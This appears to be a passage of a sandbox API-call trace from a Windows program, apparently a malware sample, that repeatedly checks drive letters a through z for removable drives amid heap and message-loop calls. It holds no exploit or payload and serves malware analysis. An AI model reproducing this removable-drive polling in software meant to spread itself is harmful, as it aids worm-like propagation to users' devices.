[0207.986] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.986] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.986] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.986] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.987] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.987] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.987] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.987] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.987] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.987] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.436] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.436] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.437] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.437] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.437] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.437] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.437] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.437] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.438] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.438] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.438] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.438] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0209.438] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0209.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0209.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0209.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0209.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0209.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.439] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0209.439] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0209.439] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0209.439] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0209.440] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0209.440] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0209.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0209.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0209.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0209.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0209.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0209.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0209.440] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0209.441] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.441] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0209.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.441] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.442] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.442] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0209.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0209.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0209.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0209.443] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.443] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.443] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.444] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.444] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.444] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.444] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.444] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.445] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.445] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.445] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.445] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.445] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.446] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.446] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.446] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.447] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.447] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.447] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.447] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.447] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.448] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.448] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.448] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.448] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.448] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.449] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0209.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0209.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0209.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0209.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.449] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0209.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0209.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0209.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0209.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0209.450] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0209.450] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.451] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0209.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.451] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0209.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.451] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0209.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.451] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0209.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.452] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.452] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.452] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.453] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.453] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.453] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.453] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.454] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.454] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.454] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.455] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.455] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.455] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.455] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.456] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.456] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.456] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.456] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.457] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.457] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.457] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.457] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.457] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.458] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.458] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.458] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.458] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0209.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0209.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0209.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0209.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.459] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0209.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0209.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0209.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0209.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0209.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0209.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0209.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0209.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0209.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.461] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0209.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.461] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0209.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0209.461] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0209.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0209.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0209.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0209.461] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0209.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0209.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 